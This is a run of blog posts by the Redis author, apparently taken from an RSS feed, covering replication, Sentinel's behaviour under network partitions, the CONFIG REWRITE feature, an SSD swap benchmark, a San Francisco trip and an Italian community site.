However you had to change the configuration file manually in order to ensure that the change will affect the instance after the next restart. Otherwise the change is only in the current in memory configuration and a restart will bring you back to the old config.

Maybe this was not the case, but it is not unlikely that Twilio engineers modified the wrong redis.conf file or forgot to do it in some way.

Fortunately Redis 2.8 provides a better workflow for on-the-fly configuration changes, that is:

redis-cli CONFIG SET appendonly yes
redis-cli CONFIG REWRITE

Basically the config rewriting feature will make sure to change the currently used configuration file, in order to contain the configuration changes operated by CONFIG SET, which is definitely safer.

In the end
===

I'll be happy to work with the Twilio engineers in the next weeks in order to understand the details and their requests and see how Redis can be improved to make incidents like this less likely to happen.

A real world test
===

I just tried to setup a master with AOF enabled, rotating disks, and a huge write load. Only trick is, it is bare metal entry-level hardware.

Then I put a steady load on it of 70k writes per second across 10 millions of keys.

Finally I tried to mass-resync four slaves form scratch multiple times.

Results:

$ redis-cli -h 192.168.1.10 --latency-history
min: 0, max: 26, avg: 0.97 (1254 samples) -- 15.00 seconds range
min: 0, max: 5, avg: 0.66 (1287 samples) -- 15.00 seconds range
min: 0, max: 2, avg: 0.62 (1290 samples) -- 15.00 seconds range
min: 0, max: 1, avg: 0.47 (1307 samples) -- 15.01 seconds range
min: 0, max: 10, avg: 0.48 (1306 samples) -- 15.00 seconds range
min: 0, max: 1, avg: 0.47 (1310 samples) -- 15.01 seconds range
min: 0, max: 3, avg: 0.45 (1311 samples) -- 15.01 seconds range
min: 0, max: 10, avg: 0.48 (1305 samples) -- 15.01 seconds range
min: 0, max: 23, avg: 0.49 (1306 samples) -- 15.01 seconds range
min: 0, max: 3, avg: 0.47 (1307 samples) -- 15.01 seconds range
min: 0, max: 36, avg: 0.86 (1255 samples) -- 15.00 seconds range
min: 0, max: 6, avg: 1.05 (1246 samples) -- 15.01 seconds range
min: 0, max: 21, avg: 0.52 (619 samples)^C

As you can see there is no moment in which the server struggles with this load. During the test the load continued to be accepted at the rate of 70k writes/sec.

This test is in no way able to simulate the Twilio architecture, but the bottom line here is, Redis is supposed to handle this well with minimally capable hardware so something odd happened, or there was a low memory condition, or there was the "EC2 effect", that is, some very poor disk performance allowed for memory pressure. Comments]]>
http://antirez.com/news/60
San Francisco http://antirez.com/news/59 http://antirez.com/news/59 Sat, 15 Jun 2013 15:45:31 +0000
Reaching San Francisco
===

If you want to reach San Francisco from Sicily, there are no direct flights helping you. My flight was a Lufthansa flight from Catania to Munich, and finally from Munich to San Francisco. This is a total of 15 hours flight, plus the stop in Munich waiting for the second flight.

Unfortunately the first flight had a delay big enough that I lost my connection. My trip was already pretty short, just four days, and this issue costed me one day reducing the total available time in SF to just 3 days... It's like to go to the other side of the world just to take a coffee.

However it's very rewarding to see Germans having an issue with precision, so I blamed a lot of people with the most heavy of the Sicilian accent... Just kidding :-) The reality is that the operators at the Catania airport, not payed by Lufthansa, said that among all the big operators Lufthansa is one of the best in terms of avoiding delays. Moreover in Munich I was "protected" in a nice enough hotel with good food and great beer.

I was not the only unlucky guy, there were other three north Americans headed to San Francisco that became my journey friends in no time, very cool people that allowed me to practice English some hours before reaching SF, recounted fun stories, and got drunk with me in the Munich -> SF flight.

Basically it's a long trip, and reaching the final destination is already an experience in itself. A direct flight would be much better: only one flight, and the process is "atomic", either you remain at the starting point or you get to the final destination, no chances to remain half-way unless the aircraft falls on the floor ;-)

The city
===

I'm a "City guy". In Sicily I live near Catania, that counting all the conurbation is like 1 million of inhabitants, not a lot but not a small town. San Francisco from this point of view is like my ideal city: people outside, gardens, large streets, bike lanes, many places where you can have a meal, and shops.

The Hotel, the Intercontinental in Howard street, was also great in every possible way, from the food to the staff that was always very professional and willing to help. The only bad thing about the Hotel was the gym, full of treadmills, without a pull-up bar, no barbells. A strange conception of fitness... I had to survive many days without doing a single deadlift.

During my permanence in SF I used a cab only two times for time constraints, I enjoyed a lot to walk around the city.

The people
===

During my time in SF I had the pleasure to visit Pivotal (my company), Adroll, Apcera, Twitter, and to attend the Redis drink up. I encountered an endless stream of smart *and* kind people, basically without exceptions. I assume that the SF guys not following The First Law Of Computing (that is "don't be an asshole") that I have the pleasure to meet on Twitter from time to time are a minority in the city.

Basically is a fantastic environment where the focus is only on getting things done in a friendly way, without rigid and useless things like the need to reach the office at 8am, but also without the employee habit of disappearing at 5pm during a deployment just because it's time to go home.

This is my philosophy as well, and it resonates very well with the way I also work at home.

Another very positive aspect is that, in the companies I visited, I never saw many meetings happening. Most of the programmers were at their desks working in a quiet enough environment. Basically it's not a coincidence that they get things done, there is the right setup, and my impression is that in average people work something like 40 hours per week like in Europe. I often read that in the US it's more like 50 or 60 hours, probably not in SF, or maybe I'm just wrong.

Women
===

I must admit that unfortunately there are not many women writing code in the average. I was lucky enough to meet a couple of outstanding women writing code, but all in all the percentage is not higher than the one in Italy. This is somewhat frustrating: from my point of view SF represents in many ways the "future" of the tech industry, they way it will probably be in many places in a few years. It is disappointing that I don't see much improvements in that regard, at the same time I've no recipes to suggest to improve things. I don't think the solution is to give some specific gender based advantage, but something should be done for example in the context of the educational system.

Children
===

In three days I heard multiple times the same story of families moving to SF and returning back to their homes in other places of US, Europe, India, or whatever, after a few months. I've no idea why this happens: from the outside it looks like a wonderful civilized city.

At the same time however there is something odd with the fact you earn 100k per year or more, and as a single you end without money to save at the end of the year. Probably that has something to do with the incompatibility between SF and families?

Also streets were full of people but it was hard to encounter children or pregnant women, this is another thing that sounds very strange from an outsider.

Food
===

Food was very good in my company, in the companies I visited (often for lunch), and when I met people in public places. I was not happy only with Greek yogurt that apparently is not the same stuff as I use to purchase here (I use the Fage brand), and in general yogurt was more like a dessert-looking thing.

Also cereals were full of sugar, and people used to drink in one day the amount of coke that in Sicily you drink in one year.

Fruit, especially apples and red fruits, were excellent, and the fruit & nuts bars completely awesome in some cases (I don't recall the brands I liked most).

The coffee is very different than the Italian one, but when it's made in the right way, it is good for me, just not as coffee as I intent it, but as another thing. However the side effect is that apparently it is a lot more caffeine rich in relation to the amount you drink in those big cups, and this caused me some issue.

My English
===

Even if a few people reported that I improved compared to when we met the previous time, the reality is that my English was the only real pain point, again. UK people are especially hard for me to understand, and I guess the opposite is also true. Fixing the language if you don't practice it is either impossible or requires a lot of time, probably I'll star to travel more. For example instead of always refusing the invitations I think I'll go to conferences much more.

Conclusion
===

It's not the first time I visit SF, I already visited the city one time a few years ago, but this is the first time I move around and meet people freely, since in my last trip I stayed mainly in Palo Alto.

I think that even if the climate is a bit odd, I would stay in SF itself if I would move in the bay area, even if probably it is going to be very expansive.

It really is a wonderful city and I hope to return visiting it soon instead of waiting three years again.

I want to say thank you to everybody I met during my trip: you are very gentle and friendly, I enjoyed it. Comments]]>
http://antirez.com/news/59
Exploring synchronous replication in Redis http://antirez.com/news/58 http://antirez.com/news/58 Mon, 27 May 2013 15:45:08 +0000
I always gave that almost for granted, as I always assumed Redis was not a good match for synchronous replication, that has an higher latency. However recently I tried to fix another issue with Redis replication, that is, timeouts are all up to the slave.

This is how it used to work:

1) Master sends data to slaves. However sometimes there is no data to send (no write traffic). We still need to send something to slaves in order to avoid slaves will detect a timeout.
2) So a master periodically sends PINGs to slaves as well, every 10 seconds by default.
3) Detection of a broken replication link is up to the slaves that will close the connection when a timeout is detected.
4) Masters are able to detect errors in the replication link only when reported by the operating system as a socket error.

So the ability of masters to detect errors in the replication link was pretty limited in Redis 2.6, and this is BAD. There are many kind of broken links that will result in no error raised in the socket, but still we end accumulating writes for a slave that is down. The only defense against this was the ability of Redis 2.6 to detect when the output buffer was too big, and close the connection before to use all the available memory as slave output buffers.

Pinging back
===

In order to fix this issue the most natural thing to do is to also ping from slave to master, so that the master can be aware of slaves, otherwise the slave -> master communication is completely zero, as slaves don't reply to write commands sent by a master in any way to save bandwidth.

However I was not very happy with sending just PING, since it was possible to send something way more useful, that is, the current *replication offset*. The replication offset is a new concept we have in 2.8 with PSYNC. Basically every master has a 64 bit global counter, about how much replication stream it produced. Moreover the replication stream is identical for all the slaves, so every slave shares the same global replication offset with the master.

The replication offset is primarily used by PSYNC, so that slaves can request a partial resynchronization asking the master to send data starting from a given offset, that is, the last offset that the slave received.

So instead of sending PINGs I made slaves pinging the masters with a new command:


REPLCONF ACK

This way the master is aware of the amount of replication stream processed so far, and as a result it knows the "lag" of the slave. This is how it looks like when we ask a slave for "INFO replication":

$ redis-cli info replication
# Replication
role:master
connected_slaves:1
slave0:127.0.0.1,6380,online,121483
master_repl_offset:121483
repl_backlog_active:1
repl_backlog_size:1048576
repl_backlog_first_byte_offset:2
repl_backlog_histlen:121482

As you can see the offset (last element) of slave0 is the same as master_repl_offset. So the slave is perfectly aligned.

Great, so far so good, but wait, isn't this half of what you need to implement synchronous replication?

Synchronous replication the easy way
===

So if we know the offset a slave processed so far, we could implement a new feature in Redis transactions, like that:


MULTI
MINREPLICAS 3 60
SET foo bar
EXEC

Here MINREPLICAS would tell Redis, make the command return only when my write reached the master and at least two slaves.
The first argument is the number of replicas, the second is a timeout, as we can't wait forever if there are not enough slaves accepting the write.

Implementing this is simple:

1) After the master processes the command, we save the current replication offset.
2) We also send REPLCONF GETACK to every slave in order to receive an ACK ASAP (otherwise sent every second).
3) We block the client, similarly to what happens when BLPOP is called.
4) As we receive enough ACKs from slaves so that N replicas have an offset already >= to the one we saved, we unblock the client.

Cool right? Synchronous replication almost for free, not affecting the other commands at all, and so forth.

No rollbacks, no fun?
===

There is a problem however, what happens if the timeout is reached and we still did not reached N replicas?

In Redis we don't have rollbacks, and I don't want to add this feature as rollbacks with complex big values are hard to implement, very costly, and will make everything too complex for my current tastes.

So, the write will *anyway* reach the master and a number of slaves < N-1 even if the transaction was not able to honor the requested MINREPLICAS count. However we can notify the user about the number of replicas reached as a first element of the MULTI/EXEC reply. This way the user may rollback manually if he wishes, or he may retry, assuming the write is idempotent…

I wonder if the feature is still useful without rollbacks.

Alternatives
===

There is an alternative: now we are able to sense slaves, so we may implement a much weaker form of check, that could be still very useful in practical systems, that is:

MINREPLICAS

Where I ask Redis to *start* the transaction only if there are at least slaves connected, with an idle time in the ACK that is less than the specified . This does not guarantee that the write will be propagated to N replicas as there is an obvious window, but we'll be sure that if slaves get disconnected or blocked in some way, after some time (chosen by the user) the writes will no longer be accepted.

What we have now
===

Slave sending ACKs back to our master entered into the 2.8 branch (as it was a bug fix, basically), so the different possibilities are open for the future, but currently I don't feel like it is the right time to implement synchronous replication in Redis without thinking more about the behavior of the feature. However the fact the underlaying mechanism is so simple is tempting... Comments]]>
http://antirez.com/news/58
Availability on planet Terah http://antirez.com/news/57 http://antirez.com/news/57 Tue, 21 May 2013 15:42:35 +0000
The inhabitants of this strange planet use two database systems. One is imported from planet Earth via the Galactic Exchange Program, and is called EDB. The other is produced by engineers from Terah, and is called TDB. The databases are functionally equivalent, but they have different semantics when a network partition happens. While the database from Earth stops accepting writes as long as it is not connected with the majority of the other database nodes, the database from Terah works as long as the majority of the clients can reach at least a database node (incidentally, the author of this story released a similar software project called Sentinel, but this is just a coincidence).

Terah users have setups like the following, with three database nodes and three web servers running clients asking queries to the database nodes ("D" denotes a database node, "C" a client).

D D D

C C C

EDB is designed to avoid problems on partitions like this:

D1 \ D D
/
C1 \ C C

C1 writing to D1 may result into lost writes if D1 happened to be the master.

However in Terah net splits are not an issue, they invented a solution for all the network partitions back in Galactic Year 712! Still their technology is currently not able to avoid that single hosts fail.

There is a sysop from Terah, Daniel Fucbitz, that always complains about EDB. He does not understand why on the Earth… oops on the Terah I mean, his company keeps importing EDB, that causes a lot of troubles. He reasons like this: "If a single node of my network fails, I'm safe with both EDB and TDB, but what happens if one night I'm not lucky and two hosts will fail at the same time?".

Actually with EDB if two nodes out of the six nodes will fail during the same night, and these nodes happen to be two "D" nodes, the system will stop working. The probability for this to happen is (3/6)*(2/5), that is... 20%!

On the other hand TDB will never stop working as long as only two nodes will fail.

And what about three nodes failing at the same time? With EDB this will bring the system down with a probability of 50% (two "D" nodes down) + 5% (all clients down), for a total probability of 55%.

While TDB would stop working with a probability of just 5% (all the three DB nodes down), plus 15% (master plus two clients down, no promotion possible), plus 5% (all clients down), for a total of 25%.

Daniel Fucbitz sometimes watches outside his office window, waiting for the third sun to raise, thinking that, yes, on planet Earth is nice to resist to partitions, but it really is not for free at all. Comments]]>
http://antirez.com/news/57
Reply to Aphyr attack to Sentinel http://antirez.com/news/55 http://antirez.com/news/55 Sun, 19 May 2013 15:42:06 +0000
[1] http://aphyr.com/tags/jepsen

Postgress, Redis Sentinel, MongoDB, and Riak are audited to find what happens during network partitions and how these systems can provide the claimed guarantees.

Redis is attacked here: http://aphyr.com/posts/283-call-me-maybe-redis

I said that Kyle "attacked" the systems on purpose, as I see a parallel with the world of computer security here, it is really a good idea to move this paradigm to the database world, to show failure modes of systems against the claims of vendors. Similarly to what happens in the security world the vendor may take the right steps to fix the system when possible, or simply the user base will be able to recognize that under certain circumstances something bad is going to happen with your data.

Another awesome thing in the Kyle's series is the educational tone, almost nothing is given for granted and the articles can be read by people that never cared about databases to distributed systems experts. Well done!

In this blog post I'll try to address the points Kyle made about Redis Sentinel, that's the system he tested.

Sentinel goals
===

In the post Kyle writes "What are the consistency and availability properties of Sentinel?".
Probably this is the only flaw I saw in this article.

Redis Sentinel is a distributed *monitoring* system, with support for automatic failover.
It is in no way a shell that wraps N Redis instances into a distributed data store. So if you consider the properties of the "Redis data store + Sentinel", what you'll find is the properties of any Redis master-slave system where there is an external component that can promote a slave into a master under certain circumstances, but has limited abilities to change the fundamental fact that Redis, without Redis Cluster, is not a distributed data store.

However it is also true that Redis Sentinel also acts as a configuration device, and even with the help of clients, so as a whole it is a complex system with given behavior that's worth analyzing.

What I'm saying here is that just the goal of the system is:

1) To promote a slave into a master if the master fails.
2) To do so in a reliable way.

All the stress here is in the point "2", that is, the fact that sentinels can be placed outside the master-slaves system makes the user able to decide a more objective point of view to declare the master as failing.

And another property is that Sentinel is distributed enough so that single sentinels can fail at any time, including during the failover process, and the process will still continue unaffected as long as it is still possible to reach the majority.

I think that the goal of Redis Sentinel is pretty clear so I'm surprised (not in a negative way) that it was tested creating a partition where the old master is in the minority together with a client, and then show that the client was still able to write to the old master. I honestly don't think any user expects something different from Redis Sentinel. That said, I'll ignore this fact from now on and reply to the different parts of the article as there is important information anyway IMHO, especially since, after all, Redis Sentinel + N Redis instances + M Clients is "A System", so Kyle analysis makes sense even under my above assumptions.

Partitioning the cluster
===

Ok I just made clear enough that there is no such goal in Sentinel to turn N Redis instances into a distributed store, so basically what happens is that:

1) Clients in the majority side will be able to continue to write once the failover is complete.
2) Clients in the minority side may possibly write to the old master, and when the network is ok again, the master will be turned into a slave of the new master, so all the writes in the minority side are lost forever.

So you can say, ok, Sentinel has a limited scope, but could you add a feature so that when the master feels in the minority it no longer accept writes? I don't think it's a good idea. What it means to be in the minority for a Redis master monitored by Sentinels (especially given that Redis and Sentinel are completely separated systems)?

Do you want your Redis master stopping to accept writes when it is no longer able to replicate to its slaves? Or do you want it when enough Sentinels are down? My guess is that given the goals of the system, instead of going down the road of stopping the master for possibly harmless conditions (or not as bad as a stopped master), just use the fact that Sentinel is very configurable: place your Sentinels and set your quorum so that you are defensive enough against partitions. This way the system will activate only when the issue is really the master node down, not a network problem. Fear data loss and partitions? Have 10 Linux boxes? Put a Sentinel in every box and set quorum to 8.

Just to be clear, the criticism is a good one, and it shows how Sentinel is not good to handle complex net splits with minimal data loss. Just this was never the goal, and what users were doing with their home-made scripts to handle failover was in the 99% of cases much worse than what Sentinel achieve as failure detection and handling of the failover process.

Redis consensus protocol
===

Another criticism is that the Sentinel protocol is complex to analyze, and even requires some help from the client.

It is true that is a complex protocol because while the agreement is vaguely byzantine looking, actually is a dynamic process without an ordered number of steps to reach an agreement. Simply the state about different things like if a node is failing or not, and who should perform the promotion, is broadcasted continuously among sentinels.

A majority is basically reached when the state of N nodes (with N >= quorum) that is no older than a given number of seconds, agrees about something.

Both failure detection and the election of the sentinel doing the failover are reasonable candidates for this informal protocol since the information every sentinel has about the availability of a given instance or sentinel itself is a moving target itself. Also the rest of the system is designed to be resistant against errors in the agreement protocol (the first sentinel recognizing a failure will force all the others to recognized it, and the failover process is auto-detected by the other instances that can monitor the elected slave. Also care is taken to avoid a protocol that is fragile against multiple sentinels doing the failover at the same time if this may ever happen).

Kyle notes that there is the concept of TILT so that Sentinel is sensible to clock skew and desynchronization. Actually there is no explicit use of absolute time in the protocol nor Sentinels are required to have a synchronized clock at all.

Just to clarify TILT is a special mode that is used when Sentinel detects its internal state is corrupted in two ways: either the system clock jumped in the past, so a Sentinel can no longer trust its *internal* state, or the clock appears to have jumped in the future, that means, the sentinel process for some reason was blocked for a long time. In both cases such a sentinel will enter TILT mode so it will stop acting for some time, until the state is believed to be already reliable. TILT is basically not part of the Sentinel protocol, but just a programming trick to make a system more reliable in presence of strange behaviors from the operating system.

Involvement of the clients
===

In Sentinel clients involvement is not mandatory since you may want to run a script during a failover so that configuration will change in some permanent way.

However the suggested mode of operation is to use clients that refresh the information when a reconnection is needed (actually we are going into the direction of forcing a periodic state refresh, and when Sentinel demotes a reappearing old master we'll send a command to the old master that forces all the connections to be dropped, this improves the reliability of the system in a considerable way).

So in the article I can read:

* Sentinels could promote a node no clients can see
* Sentinels could demote the only node clients can actually reach
* …

And so forth. Again here the point is, Sentinel is designed exactly to let you pick your tradeoffs from that point of view, and the documentation suggests that your Sentinels stay in the same machines where you run your clients, web servers, and so forth, not into the Redis server nodes.

Because indeed almost always the point of view you want to say something is "down" is the point of view of the client.

Broken things Kyle did not investigated
===

Kyle did a great work to show you want you should *not* expect from Sentinel.

There is much more we are to fix, because HA is a complex problem in master -> slave systems. For instance the current version of Sentinel does not handle well enough reconfigured instances that reboot with an old config: sometimes you may just lost a slave that is ignored by Sentinels.

This and other problems are still a work in progress, and what I'm trying to provide with Redis Sentinel is a monitoring and failover solution that does not suck so much, as in, you can select the point of view of what "down" means, both topologically and as a quorum, and you can stay sure that a few sentinels going away will not break your failover process.

Redis Cluster
===

Redis Cluster is a system much more similar to what Kyle had in mind when testing Sentinel. For instance after a split the side with the minority of slaves will stop accepting writes so while there is always a window for data loss, there is in the big picture of things always only a single part of the network that accepts writes.

I invite you to read the other articles in the Kyle's series, they are very informative.

Thank you Kyle, please keep attacking databases. Comments]]>
http://antirez.com/news/55
Redis configuration rewriting http://antirez.com/news/54 http://antirez.com/news/54 Mon, 13 May 2013 15:41:46 +0000 Redis 2.8 will not contain Redis Cluster, and its implementation of Redis Sentinel is the same as 2.6 and unstable branches, (Sentinel is taken mostly in sync in all the branches being fundamentally a different project using Redis just as framework).

However there are many new interesting features in Redis 2.8 that are back ported from the unstable branch. Basically 2.8 it's our usual "in the middle" release, like 2.4 was: waiting for Redis 3.0 that will feature Redis Cluster (we have great progresses about it! See https://vimeo.com/63672368), we'll have a 2.8 release with everything that is ready to be released into the unstable branch. The goal is of course to put more things in the hands of users ASAP.

The big three new entries into Redis 2.8 are replication partial resynchronizations (already covered in this blog), keyspace events notifications via Pub/Sub, and finally CONFIG REWRITE, a feature I just finished to implement (you can find it in the config-rewrite branch at Github). The post explains what CONFIG REWRITE is.

An inverted workflow
===

Almost every unix daemon works like that:

1) You have a configuration file.
2) When you need to hack the configuration, you modify it and either restart the daemon, or send it a signal to reload the config.

It's been this way forever, but with Redis I took a different path since the start: as long as I understood people created "farms" of Redis servers either to provision them on-demand, or for internal usage where a big number of Redis servers are used, I really wanted to provide a different paradigm that was more "network oriented".

This is why I introduced the CONFIG command, with its sub commands GET and SET. At the start the ability of CONFIG was pretty basic, but now you can reconfigure almost every aspect of Redis on the fly, just sending commands to the server. This is extreme enough you can change persistence type when an instance is running. For example just typing:

CONFIG SET appendonly yes

Will switch on the Append Only File, will start a rewrite process to create the first AOF, and so forth. Similarly it is possible to alter from replication to memory limits and policy while the server is running, just interacting with the server with normal commands without any "hook" inside the operating system running Redis.

The symmetrical command CONFIG GET is used to query the configuration. Some users are more conservative in how they handle their servers and may want to always touch the configurations manually, but my idea was that the two commands provided quite a powerful system to handle a large number of instances in a scriptable way without the use of additional software layers, and avoiding restarts of the server that are costly, especially in the case of an in memory database.

However there was a major issue, after you modified an important configuration parameter with CONFIG SET, later you had to report the change into the redis.conf file manually, so that after the restart Redis would use the new config. As you can guess this was a huge limitation, basically the CONFIG API was only useful to hack the config live and avoid a reboot, but manual intervention or some other software layer to handle the configuration of your servers was needed anyway.

So the idea to solve this issue was to add as soon as possible a new command, CONFIG REWRITE, that would rewrite the Redis configuration to report the changes in memory.
So the new work flow would be like that:

CONFIG SET appendonly yes
CONFIG REWRITE

However I was trying to do a complete refactoring of the config.c file in order to implement this feature easily, but this was the best recipe to delay the feature forever… Finally I decided to implement it before the 2.8 release, without waiting for a refactoring, but implementing the new feature in a way that is refactor-friendly. So basically, we finally have it!

I believe that now that CONFIG REWRITE somewhat completes the triad of the configuration API, users will greatly benefit from that, both in the case of small users that will do configuration changes from redis-cli in a very reliable way, without a restart, without the possibility of configuration errors in redis.conf, and for big users of course where scripting a large farm of Redis instances can be very useful.

Before to continue: If you want to play with config rewrite, clone the config-rewrite branch at Github (but the feature will be merged into 2.8 and unstable soon), and play with it.

A gentle rewrite
===

Rewriting a configuration file is harder than it seems at first. Actually to do a brutal rewrite is trivial, you just write every configuration parameter with the current value in the new file, and you are done, but this has a number of side effects:

1) User comments and overall redis.conf structure go away, lost forever.
2) You get a number of things set explicitly to its default value.
3) After a server upgrade, because of "2", maybe you'll run an old default value that now changed.

So CONFIG REWRITE tries to follow a set of rules to make the rewriting more gentle, touching only the minimum possible, and preserving everything else.

This is how it works:

1) Comments are always preserved.
2) If an option was already present in the old redis.conf, the same line is used for the same option in the new file.
3) If an option was not present and is set at its default value, it is not added.
4) If an option was not present, but the new value is no longer its default, the option is appended at the end of the file.
5) All the no longer useful lines in the old configuration file are blanked (for example if there were three "save" options, but only two are used in the new config).

However if the configuration file for some reason no longer exists, CONFIG REWRITE will create it from scratch. The rules followed are the above anyway, just assuming an empty old configuration file, so the effect is to just produce a configuration file with every option not set to the default value.

An example
===

Just to make everything a bit more real, that's an example.

I start Redis with the following configuration file:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir .
---

After a CONFIG REWRITE without changing any parameter what I see is:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir "/Users/antirez/hack/redis/src"
---

As you can see the only difference is that "dir" was turned into an absolute path in that case, only because it was not already. The path is also quoted inside "" as certain options are rewritten in order to support special characters.

At this point I use the following commands:

redis 127.0.0.1:6379> config set appendonly yes
OK
redis 127.0.0.1:6379> config set maxmemory 10000000
OK
redis 127.0.0.1:6379> config rewrite
OK

Now the configuration file looks like that:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir "/Users/antirez/hack/redis/src"

# Generated by CONFIG REWRITE
maxmemory 10000000
appendonly yes
---

As you can see new configurations are appended at the end.

Finally I make a change that requires deleting some previous line:

redis 127.0.0.1:6379> config set save ""
OK
redis 127.0.0.1:6379> config rewrite
OK

The new config file is the following:

---
# This is a comment

# Hello world
dir "/Users/antirez/hack/redis/src"

# Generated by CONFIG REWRITE
maxmemory 10000000
appendonly yes
---

Comments are preserved but multiple blank lines are squeezed to a single one.

Thanks for reading! Comments]]>
http://antirez.com/news/54
Hacking Italia http://antirez.com/news/53 http://antirez.com/news/53 Mon, 06 May 2013 15:41:23 +0000
Hacking Italia e' un sito di "social news", molto simile ad Hacker News, il celebre collettore di news per hacker di YCombinator. A che serve un sito italiano, e in italiano se c'e' gia' molto di piu' e di meglio nel panorama internazionale? A mettere assieme una massa critica di persone "giuste" in Italia.

Mettere assieme le persone significa molto, specialmente in un paese stretto e lungo 1500 chilometri, dove le occasioni di incontri tra programmatori e startupper sono ridotte, i finanziatori nascosti in chissa' quali palazzi, inaccessibili ai piu'. Sono 15 anni che faccio questo mestiere e conosco pochissime persone in Italia, e una quantita' in tutto il resto del mondo... e dire che non e' certo un paese dove manca la passione per il codice e per l'innovazione, come la storia ci ricorda.

E allora mettersi assieme significa, tanto per iniziare, avere gia' una piccola vetrina di persone a cui presentare la tua idea. Significa anche discutere assieme dei temi che non sono di nessun interesse per chi non opera nel nostro territorio, come le forme societarie e i mille problemi burocratici a cui ci tocca far fronte. Inoltre mentre probabilmente creare un clone dei servizi affermati globalmente, come Youtube o Gmail, per il mercato italiano, e' una operazione senza alcun merito, questo sono significa che non esistono delle startup che potrebbero essere di grande successo e che abbiano come target il territorio italiano: news, ristorazione, business to business, medicina... ci sono infiniti temi che si possono trattare facendo leva sul fatto che le economie di scala consentono, a chi opera in Italia, di fare meglio per gli italiani.

Per cui se questi temi sono importanti anche per voi, spargete la voce, registratevi, e date il vostro contributo.

Un po' di background per finire. Il progetto e' nato grazie al fatto che da qualche settimana, qui a Catania, abbiamo iniziato ad incontrarci tra programmatori. Prendiamo una birra, e parliamo di hacking, e non solo. Non avrei mai pensato che questo potesse accadere a dire il vero, parlare di cose davvero tecniche (e interessanti) a pochi chilometri da casa mia. E parlando un po' e' nata questa idea... dunque grazie ad Angelo, Fabio, Geert, Giuseppe, Marcello, e arrivederci sia al pub che sul nuovo sito! Comments]]>
http://antirez.com/news/53
Redis with an SSD swap, not what you want http://antirez.com/news/52 http://antirez.com/news/52 Wed, 06 Mar 2013 15:41:02 +0000
The setup: a Linux box with 24 GB of RAM, with two disks.

A) A spinning disk.
b) An SSD (Intel 320 series).

The idea is, what happens if I set the SSD disk partition as a swap partition and fill Redis with a dataset larger than RAM?
It is a lot of time I want to do this test, especially now that Redis focus is only on RAM and I abandoned the idea of targeting disk for a number of reasons.

I already guessed that the SSD swap setup would perform in a bad way, but I was not expecting it was *so bad*.

Before testing this setup, let's start testing Redis in memory with in the same box with a 10 GB data set.

IN MEMORY TEST
===

To start I filled the instance with:

./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo

Write load in this way is very high, more than half million SET commands processed per second using a single core:

instantaneous_ops_per_sec:629782

This is possible because we using a pipeline of 32 commands per time (see -P 32), so it is possible to limit the number of sys calls involved in the processing of commands, and the network latency component as well.

After a few minutes I reached 10 GB of memory used by Redis, so I tried to save the DB while still sending the same write load to the server to see what the additional memory usage due to copy on write would be in such a stress conditions:

[31930] 07 Mar 12:06:48.682 * RDB: 6991 MB of memory used by copy-on-write

almost 7GB of additional memory used, that is 70% more memory.
Note that this is an interesting value since it is exactly the worst case scenario you can get with Redis:

1) Peak load of more than 0.6 million writes per second.
2) Writes are completely distributed across the data set, there is no working set in this case, all the DB is the working set.

But given the enormous pressure on copy on write exercised by this workload, what is the write performance in this case while the system is saving? To find the value I started a BGSAVE and at the same time started the benchmark again:

$ redis-cli bgsave; ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
Background saving started
^Ct key:rand:000000000000 foo: 251470.34

250k ops/sec was the lower number I was able to get, as once copy on write starts to happen, there is less and less copy on write happening every second, and the benchmark soon returns to 0.6 million ops per second.
The number of keys was in the order of 100 million here.

Basically the result of this test is, with real hardware and persisting to a normal spinning disk, Redis performs very well as long as you have enough RAM for your data, and for the additional memory used while saving. No big news so far.

SSD SWAP TEST
===

For the SSD test we still use the spinning disk attached to the system in order to persist, so that the SSD is just working as a swap partition.

To fill the instance even more I just started again redis-benchmark with the same command line, since with the specific parameters, if running forever, it would set 1 billion keys, that's enough :-)

Since the instance has 24 GB of physical RAM, for the test to be meaningful I wanted to add enough data to reach 50 GB of used memory. In order to speedup the process of filling the instance I disabled persistence for some time using:

CONFIG SET SAVE ""

While filling the instance, at some point I started a BGSAVE to force some more swapping.
Then when the BGSAVE finished, I started the benchmark again:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
^Ct key:rand:000000000000 foo: 1034.16

As you can see the results were very bad initially, probably the main hash table ended swapped. After some time it started to perform in a decent way again:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
^Ct key:rand:000000000000 foo: 116057.11

I was able to stop and restart the benchmark multiple times and still get decent performances on restarts, as long I was not saving at the same time. However performances continued to be very erratic, jumping from 200k to 50k sets per second.

…. and after 10 minutes …

It only went from 23 GB of memory used to 24 GB, with 2 GB of data set swapped on disk.

As soon as it started to have a few GB swapped performances started to be simply too poor to be acceptable.

I then tried with reads:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 get key:rand:000000000000
^Ct key:rand:000000000000 foo: 28934.12

Same issue, 30k ops per second both for GET and SET, and *a lot* of swap activity at the same time.
What's worse is that the system was pretty unresponsive as a whole at this point.

At this point I stopped the test, the system was slow enough that filling it even more would require a lot of time, and as more data was swapped performances started to get worse.

WHAT HAPPENS?
===

What happens is simple, Redis is designed to work in an environment where random access of memory is very fast.
Hash tables, and the way Redis objects are allocated is all based on this concept.

Now let's give a look at the SSD 320 disk specifications:

Random write (100% Span) -> 400 IOPS
Random write (8GB Span) -> 23000 IOPS

Basically what happens is that at some point Redis starts to force the OS to move memory pages between RAM and swap at *every* operation performed, since we are accessed keys at random, and there are no more spare pages.

CONCLUSION
===

Redis is completely useless in this way. Systems designed to work in this kind of setups like Twitter fatcache or the recently announced Facebook McDipper need to be SSD-aware, and can probably work reasonably only when a simple GET/SET/DEL model is used.

I also expect that the pathological case for this systems, that is evenly distributed writes with big span, is not going to be excellent because of current SSD disk limits, but that's exactly the case Redis is trying to solve for most users.

The freedom Redis gets from the use of memory allows us to serve much more complex tasks at very good peak performance and with minimal system complexity and underlying assumptions.

TL;DR: the outcome of this test was expected and Redis is an in-memory system :-) Comments]]>
http://antirez.com/news/52
Log driven programming is a real productivity booster. http://antirez.com/news/51 http://antirez.com/news/51 Tue, 26 Feb 2013 15:40:42 +0000
